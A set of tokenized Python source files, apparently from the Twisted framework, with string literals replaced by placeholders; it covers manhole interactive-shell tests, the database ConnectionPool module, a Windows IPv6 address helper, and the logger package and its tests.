<EOL> self . assertFalse ( interpreter . buffer ) <EOL> class ManholeProtocolTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_interruptResetsInterpreterBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransport ( ) <EOL> terminal = insults . ServerProtocol ( manhole . Manhole ) <EOL> terminal . makeConnection ( transport ) <EOL> protocol = terminal . terminalProtocol <EOL> interpreter = protocol . interpreter <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> protocol . handle_INT ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class WriterTests ( unittest . TestCase ) : <EOL> def testInteger ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT:1>" ) <EOL> def testDoubleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testSingleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleSingleQuotedString ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleDoubleQuotedString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testFunctionDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testClassDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> class ManholeLoopbackMixin : <EOL> serverProtocol = manhole . ColoredManhole <EOL> def wfd ( self , d ) : <EOL> return defer . waitForDeferred ( d ) <EOL> def testSimpleExpression ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT:2>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testTripleQuoteLineContinuation ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testFunctionDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testClassDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testException ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' + defaultFunctionName , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testControlC ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" + manhole . CTRL_C + <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def test_interruptDuringContinuation ( self ) : <EOL> """<STR_LIT>""" <EOL> continuing = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> def gotContinuation ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> interrupted = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_C ) <EOL> return interrupted <EOL> continuing . addCallback ( gotContinuation ) <EOL> def gotInterruption ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> continuing . addCallback ( gotInterruption ) <EOL> return continuing <EOL> def testControlBackslash ( self ) : <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> partialLine = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> def gotPartialLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_BACKSLASH ) <EOL> d = self . recvlineClient . onDisconnection <EOL> return self . assertFailure ( d , error . ConnectionDone ) <EOL> def gotClearedLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> return partialLine . addCallback ( gotPartialLine ) . addCallback ( <EOL> gotClearedLine ) <EOL> @ defer . inlineCallbacks <EOL> def test_controlD ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_D + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( "<STR_LIT:\n>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_D ) <EOL> d = self . recvlineClient . onDisconnection <EOL> yield self . assertFailure ( d , error . ConnectionDone ) <EOL> @ defer . inlineCallbacks <EOL> def testControlL ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_L + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> def test_controlA ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> def test_controlE ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' + '<STR_LIT>' + '<STR_LIT:">' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> @ defer . inlineCallbacks <EOL> def test_deferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( <EOL> "<STR_LIT>" ) <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> class ManholeLoopbackTelnetTests ( _TelnetMixin , unittest . TestCase , <EOL> ManholeLoopbackMixin ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ManholeLoopbackSSHTests ( _SSHMixin , unittest . TestCase , <EOL> ManholeLoopbackMixin ) : <EOL> """<STR_LIT>""" <EOL> if ssh is None : <EOL> skip = "<STR_LIT>" <EOL> class ManholeLoopbackStdioTests ( _StdioMixin , unittest . TestCase , <EOL> ManholeLoopbackMixin ) : <EOL> """<STR_LIT>""" <EOL> if stdio is None : <EOL> skip = "<STR_LIT>" <EOL> else : <EOL> serverProtocol = stdio . ConsoleManhole </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from twisted . internet import threads <EOL> from twisted . python import reflect , log <EOL> class ConnectionLost ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class Connection ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pool ) : <EOL> self . _pool = pool <EOL> self . _connection = None <EOL> self . reconnect ( ) <EOL> def close ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> if not self . _pool . reconnect : <EOL> self . _connection . rollback ( ) <EOL> return <EOL> try : <EOL> self . _connection . rollback ( ) <EOL> curs = self . _connection . cursor ( ) <EOL> curs . execute ( self . _pool . good_sql ) <EOL> curs . close ( ) <EOL> self . _connection . commit ( ) <EOL> return <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> self . _pool . disconnect ( self . _connection ) <EOL> if self . _pool . noisy : <EOL> log . msg ( "<STR_LIT>" ) <EOL> raise ConnectionLost ( ) <EOL> def reconnect ( self ) : <EOL> if self . _connection is not None : <EOL> self . _pool . disconnect ( self . _connection ) <EOL> self . _connection = self . _pool . connect ( ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _connection , name ) <EOL> class Transaction : <EOL> """<STR_LIT>""" <EOL> _cursor = None <EOL> def __init__ ( self , pool , connection ) : <EOL> self . _pool = pool <EOL> self . _connection = connection <EOL> self . reopen ( ) <EOL> def close ( self ) : <EOL> _cursor = self . _cursor <EOL> self . _cursor = None <EOL> _cursor . close ( ) <EOL> def reopen ( self ) : <EOL> if self . _cursor is not None : <EOL> self . close ( ) <EOL> try : <EOL> self . _cursor = self . _connection . cursor ( ) <EOL> return <EOL> except : <EOL> if not self . _pool . reconnect : <EOL> raise <EOL> else : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> if self . _pool . noisy : <EOL> log . msg ( '<STR_LIT>' ) <EOL> self . reconnect ( ) <EOL> self . _cursor = self . _connection . cursor ( ) <EOL> def reconnect ( self ) : <EOL> self . _connection . reconnect ( ) <EOL> self . _cursor = None <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _cursor , name ) <EOL> class ConnectionPool : <EOL> """<STR_LIT>""" <EOL> CP_ARGS = "<STR_LIT>" . split ( ) <EOL> noisy = False <EOL> min = <NUM_LIT:3> <EOL> max = <NUM_LIT:5> <EOL> name = None <EOL> openfun = None <EOL> reconnect = False <EOL> good_sql = '<STR_LIT>' <EOL> running = False <EOL> connectionFactory = Connection <EOL> transactionFactory = Transaction <EOL> shutdownID = None <EOL> def __init__ ( self , dbapiName , * connargs , ** connkw ) : <EOL> """<STR_LIT>""" <EOL> self . dbapiName = dbapiName <EOL> self . dbapi = reflect . namedModule ( dbapiName ) <EOL> if getattr ( self . dbapi , '<STR_LIT>' , None ) != '<STR_LIT>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> if getattr ( self . dbapi , '<STR_LIT>' , <NUM_LIT:0> ) < <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' ) <EOL> reactor = connkw . pop ( '<STR_LIT>' , None ) <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> self . connargs = connargs <EOL> self . connkw = connkw <EOL> for arg in self . CP_ARGS : <EOL> cpArg = '<STR_LIT>' % ( arg , ) <EOL> if cpArg in connkw : <EOL> setattr ( self , arg , connkw [ cpArg ] ) <EOL> del connkw [ cpArg ] <EOL> self . min = min ( self . min , self . max ) <EOL> self . max = max ( self . min , self . max ) <EOL> self . connections = { } <EOL> from twisted . python import threadpool <EOL> import thread <EOL> self . threadID = thread . get_ident <EOL> self . threadpool = threadpool . ThreadPool ( self . min , self . max ) <EOL> self . startID = self . _reactor . callWhenRunning ( self . _start ) <EOL> def _start ( self ) : <EOL> self . startID = None <EOL> return self . start ( ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . running : <EOL> self . threadpool . start ( ) <EOL> self . shutdownID = self . _reactor . addSystemEventTrigger ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . finalClose ) <EOL> self . running = True <EOL> def runWithConnection ( self , func , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> return threads . deferToThreadPool ( reactor , self . threadpool , <EOL> self . _runWithConnection , <EOL> func , * args , ** kw ) <EOL> def _runWithConnection ( self , func , * args , ** kw ) : <EOL> conn = self . connectionFactory ( self ) <EOL> try : <EOL> result = func ( conn , * args , ** kw ) <EOL> conn . commit ( ) <EOL> return result <EOL> except : <EOL> excType , excValue , excTraceback = sys . exc_info ( ) <EOL> try : <EOL> conn . rollback ( ) <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> raise excType , excValue , excTraceback <EOL> def runInteraction ( self , interaction , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> return threads . deferToThreadPool ( reactor , self . threadpool , <EOL> self . _runInteraction , <EOL> interaction , * args , ** kw ) <EOL> def runQuery ( self , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return self . runInteraction ( self . _runQuery , * args , ** kw ) <EOL> def runOperation ( self , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return self . runInteraction ( self . _runOperation , * args , ** kw ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . shutdownID : <EOL> self . _reactor . removeSystemEventTrigger ( self . shutdownID ) <EOL> self . shutdownID = None <EOL> if self . startID : <EOL> self . _reactor . removeSystemEventTrigger ( self . startID ) <EOL> self . startID = None <EOL> self . finalClose ( ) <EOL> def finalClose ( self ) : <EOL> """<STR_LIT>""" <EOL> self . shutdownID = None <EOL> self . threadpool . stop ( ) <EOL> self . running = False <EOL> for conn in self . connections . values ( ) : <EOL> self . _close ( conn ) <EOL> self . connections . clear ( ) <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> tid = self . threadID ( ) <EOL> conn = self . connections . get ( tid ) <EOL> if conn is None : <EOL> if self . noisy : <EOL> log . msg ( '<STR_LIT>' % ( self . dbapiName , <EOL> self . connargs or '<STR_LIT>' , <EOL> self . connkw or '<STR_LIT>' ) ) <EOL> conn = self . dbapi . connect ( * self . connargs , ** self . connkw ) <EOL> if self . openfun != None : <EOL> self . openfun ( conn ) <EOL> self . connections [ tid ] = conn <EOL> return conn <EOL> def disconnect ( self , conn ) : <EOL> """<STR_LIT>""" <EOL> tid = self . threadID ( ) <EOL> if conn is not self . connections . get ( tid ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if conn is not None : <EOL> self . _close ( conn ) <EOL> del self . connections [ tid ] <EOL> def _close ( self , conn ) : <EOL> if self . noisy : <EOL> log . msg ( '<STR_LIT>' % ( self . dbapiName , ) ) <EOL> try : <EOL> conn . close ( ) <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> def _runInteraction ( self , interaction , * args , ** kw ) : <EOL> conn = self . connectionFactory ( self ) <EOL> trans = self . transactionFactory ( self , conn ) <EOL> try : <EOL> result = interaction ( trans , * args , ** kw ) <EOL> trans . close ( ) <EOL> conn . commit ( ) <EOL> return result <EOL> except : <EOL> excType , excValue , excTraceback = sys . exc_info ( ) <EOL> try : <EOL> conn . rollback ( ) <EOL> except : <EOL> log . err ( None , "<STR_LIT>" ) <EOL> raise excType , excValue , excTraceback <EOL> def _runQuery ( self , trans , * args , ** kw ) : <EOL> trans . execute ( * args , ** kw ) <EOL> return trans . fetchall ( ) <EOL> def _runOperation ( self , trans , * args , ** kw ) : <EOL> trans . execute ( * args , ** kw ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . dbapiName , <EOL> '<STR_LIT>' : self . min , <EOL> '<STR_LIT>' : self . max , <EOL> '<STR_LIT>' : self . noisy , <EOL> '<STR_LIT>' : self . reconnect , <EOL> '<STR_LIT>' : self . good_sql , <EOL> '<STR_LIT>' : self . connargs , <EOL> '<STR_LIT>' : self . connkw } <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> self . __init__ ( self . dbapiName , * self . connargs , ** self . connkw ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from socket import socket , AF_INET6 , SOCK_STREAM <EOL> from ctypes import ( <EOL> WinDLL , byref , create_string_buffer , c_int , c_void_p , <EOL> POINTER , Structure , cast , string_at ) <EOL> WS2_32 = WinDLL ( '<STR_LIT>' ) <EOL> SOCKET = c_int <EOL> DWORD = c_int <EOL> LPVOID = c_void_p <EOL> LPSOCKADDR = c_void_p <EOL> LPWSAPROTOCOL_INFO = c_void_p <EOL> LPTSTR = c_void_p <EOL> LPDWORD = c_void_p <EOL> LPWSAOVERLAPPED = c_void_p <EOL> LPWSAOVERLAPPED_COMPLETION_ROUTINE = c_void_p <EOL> WSAIoctl = WS2_32 . WSAIoctl <EOL> WSAIoctl . argtypes = [ <EOL> SOCKET , DWORD , LPVOID , DWORD , LPVOID , DWORD , LPDWORD , <EOL> LPWSAOVERLAPPED , LPWSAOVERLAPPED_COMPLETION_ROUTINE ] <EOL> WSAIoctl . restype = c_int <EOL> WSAAddressToString = WS2_32 . WSAAddressToStringA <EOL> WSAAddressToString . argtypes = [ <EOL> LPSOCKADDR , DWORD , LPWSAPROTOCOL_INFO , LPTSTR , LPDWORD ] <EOL> WSAAddressToString . restype = c_int <EOL> SIO_ADDRESS_LIST_QUERY = <NUM_LIT> <EOL> WSAEFAULT = <NUM_LIT> <EOL> class SOCKET_ADDRESS ( Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , c_void_p ) , <EOL> ( '<STR_LIT>' , c_int ) ] <EOL> def make_SAL ( ln ) : <EOL> class SOCKET_ADDRESS_LIST ( Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , c_int ) , <EOL> ( '<STR_LIT>' , SOCKET_ADDRESS * ln ) ] <EOL> return SOCKET_ADDRESS_LIST <EOL> def win32GetLinkLocalIPv6Addresses ( ) : <EOL> """<STR_LIT>""" <EOL> s = socket ( AF_INET6 , SOCK_STREAM ) <EOL> size = <NUM_LIT> <EOL> retBytes = c_int ( ) <EOL> for i in range ( <NUM_LIT:2> ) : <EOL> buf = create_string_buffer ( size ) <EOL> ret = WSAIoctl ( <EOL> s . fileno ( ) , <EOL> SIO_ADDRESS_LIST_QUERY , <NUM_LIT:0> , <NUM_LIT:0> , buf , size , byref ( retBytes ) , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if ret and retBytes . value : <EOL> size = retBytes . value <EOL> else : <EOL> break <EOL> if ret : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> addrList = cast ( buf , POINTER ( make_SAL ( <NUM_LIT:0> ) ) ) <EOL> addrCount = addrList [ <NUM_LIT:0> ] . iAddressCount <EOL> addrList = cast ( buf , POINTER ( make_SAL ( addrCount ) ) ) <EOL> addressStringBufLength = <NUM_LIT> <EOL> addressStringBuf = create_string_buffer ( addressStringBufLength ) <EOL> retList = [ ] <EOL> for i in range ( addrList [ <NUM_LIT:0> ] . iAddressCount ) : <EOL> retBytes . value = addressStringBufLength <EOL> address = addrList [ <NUM_LIT:0> ] . Address [ i ] <EOL> ret = WSAAddressToString ( <EOL> address . lpSockaddr , address . iSockaddrLength , <NUM_LIT:0> , addressStringBuf , <EOL> byref ( retBytes ) ) <EOL> if ret : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> retList . append ( string_at ( addressStringBuf ) ) <EOL> return [ addr for addr in retList if '<STR_LIT:%>' in addr ] </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> ] <EOL> from . _levels import InvalidLogLevelError , LogLevel <EOL> from . _flatten import extractField <EOL> from . _format import ( <EOL> formatEvent , formatEventAsClassicLogText , formatTime , timeFormatRFC3339 , <EOL> ) <EOL> from . _logger import Logger , _loggerFor <EOL> from . _observer import ILogObserver , LogPublisher <EOL> from . _buffer import LimitedHistoryLogObserver <EOL> from . _file import FileLogObserver , textFileLogObserver <EOL> from . _filter import ( <EOL> PredicateResult , ILogFilterPredicate , FilteringLogObserver , <EOL> LogLevelFilterPredicate <EOL> ) <EOL> from . _stdlib import STDLibLogObserver <EOL> from . _io import LoggingFile <EOL> from . _legacy import LegacyLogObserverWrapper <EOL> from . _global import ( <EOL> globalLogPublisher , globalLogBeginner , LogBeginner <EOL> ) <EOL> from . _json import ( <EOL> eventAsJSON , eventFromJSON , <EOL> jsonFileLogObserver , eventsFromJSONLogFile <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> from . . _levels import InvalidLogLevelError <EOL> from . . _levels import LogLevel <EOL> from . . _format import formatEvent <EOL> from . . _logger import Logger <EOL> from . . _global import globalLogPublisher <EOL> class TestLogger ( Logger ) : <EOL> """<STR_LIT>""" <EOL> def emit ( self , level , format = None , ** kwargs ) : <EOL> def observer ( event ) : <EOL> self . event = event <EOL> globalLogPublisher . addObserver ( observer ) <EOL> try : <EOL> Logger . emit ( self , level , format , ** kwargs ) <EOL> finally : <EOL> globalLogPublisher . removeObserver ( observer ) <EOL> self . emitted = { <EOL> "<STR_LIT>" : level , <EOL> "<STR_LIT>" : format , <EOL> "<STR_LIT>" : kwargs , <EOL> } <EOL> class LogComposedObject ( object ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> def __init__ ( self , state = None ) : <EOL> self . state = state <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( state = self . state ) <EOL> class LoggerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> namespace = "<STR_LIT>" <EOL> log = Logger ( namespace ) <EOL> self . assertEqual ( repr ( log ) , "<STR_LIT>" . format ( repr ( namespace ) ) ) <EOL> def test_namespaceDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> log = Logger ( ) <EOL> self . assertEqual ( log . namespace , __name__ ) <EOL> def test_namespaceAttribute ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = LogComposedObject ( ) <EOL> expectedNamespace = "<STR_LIT>" . format ( <EOL> obj . __module__ , <EOL> obj . __class__ . __name__ , <EOL> ) <EOL> self . assertEqual ( obj . log . namespace , expectedNamespace ) <EOL> self . assertEqual ( LogComposedObject . log . namespace , expectedNamespace ) <EOL> self . assertIs ( LogComposedObject . log . source , LogComposedObject ) <EOL> self . assertIs ( obj . log . source , obj ) <EOL> self . assertIs ( Logger ( ) . source , None ) <EOL> def test_descriptorObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> observed = [ ] <EOL> class MyObject ( object ) : <EOL> log = Logger ( observer = observed . append ) <EOL> MyObject . log . info ( "<STR_LIT:hello>" ) <EOL> self . assertEqual ( len ( observed ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( observed [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , "<STR_LIT:hello>" ) <EOL> def test_sourceAvailableForFormatting ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = LogComposedObject ( "<STR_LIT:hello>" ) <EOL> log = obj . log <EOL> log . error ( "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , log . event ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , obj ) <EOL> stuff = formatEvent ( log . event ) <EOL> self . assertIn ( "<STR_LIT>" , stuff ) <EOL> def test_basicLogger ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> for level in LogLevel . iterconstants ( ) : <EOL> format = "<STR_LIT>" <EOL> message = format . format ( level_name = level . name ) <EOL> logMethod = getattr ( log , level . name ) <EOL> logMethod ( format , junk = message , level_name = level . name ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , level ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , format ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] [ "<STR_LIT>" ] , message ) <EOL> self . assertTrue ( hasattr ( log , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , format ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , level ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , __name__ ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , None ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , message ) <EOL> self . assertEqual ( formatEvent ( log . event ) , message ) <EOL> def test_sourceOnClass ( self ) : <EOL> """<STR_LIT>""" <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , Thingo ) <EOL> class Thingo ( object ) : <EOL> log = TestLogger ( observer = observer ) <EOL> Thingo . log . info ( ) <EOL> def test_sourceOnInstance ( self ) : <EOL> """<STR_LIT>""" <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , thingo ) <EOL> class Thingo ( object ) : <EOL> log = TestLogger ( observer = observer ) <EOL> thingo = Thingo ( ) <EOL> thingo . log . info ( ) <EOL> def test_sourceUnbound ( self ) : <EOL> """<STR_LIT>""" <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , None ) <EOL> log = TestLogger ( observer = observer ) <EOL> log . info ( ) <EOL> def test_defaultFailure ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> try : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> except RuntimeError : <EOL> log . failure ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( RuntimeError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , LogLevel . critical ) <EOL> self . assertEqual ( log . emitted [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_conflictingKwargs ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> log . warn ( <EOL> u"<STR_LIT:*>" , <EOL> log_format = "<STR_LIT:#>" , <EOL> log_level = LogLevel . error , <EOL> log_namespace = "<STR_LIT>" , <EOL> log_source = "<STR_LIT>" , <EOL> ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , u"<STR_LIT:*>" ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , LogLevel . warn ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , log . namespace ) <EOL> self . assertEqual ( log . event [ "<STR_LIT>" ] , None ) <EOL> def test_logInvalidLogLevel ( self ) : <EOL> """<STR_LIT>""" <EOL> log = TestLogger ( ) <EOL> log . emit ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( InvalidLogLevelError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> def test_trace ( self ) : <EOL> """<STR_LIT>""" <EOL> def publisher ( event ) : <EOL> observer ( event ) <EOL> def observer ( event ) : <EOL> self . assertEqual ( event [ "<STR_LIT>" ] , [ ( log , publisher ) ] ) <EOL> log = TestLogger ( observer = publisher ) <EOL> log . info ( "<STR_LIT>" , log_trace = [ ] ) </s>
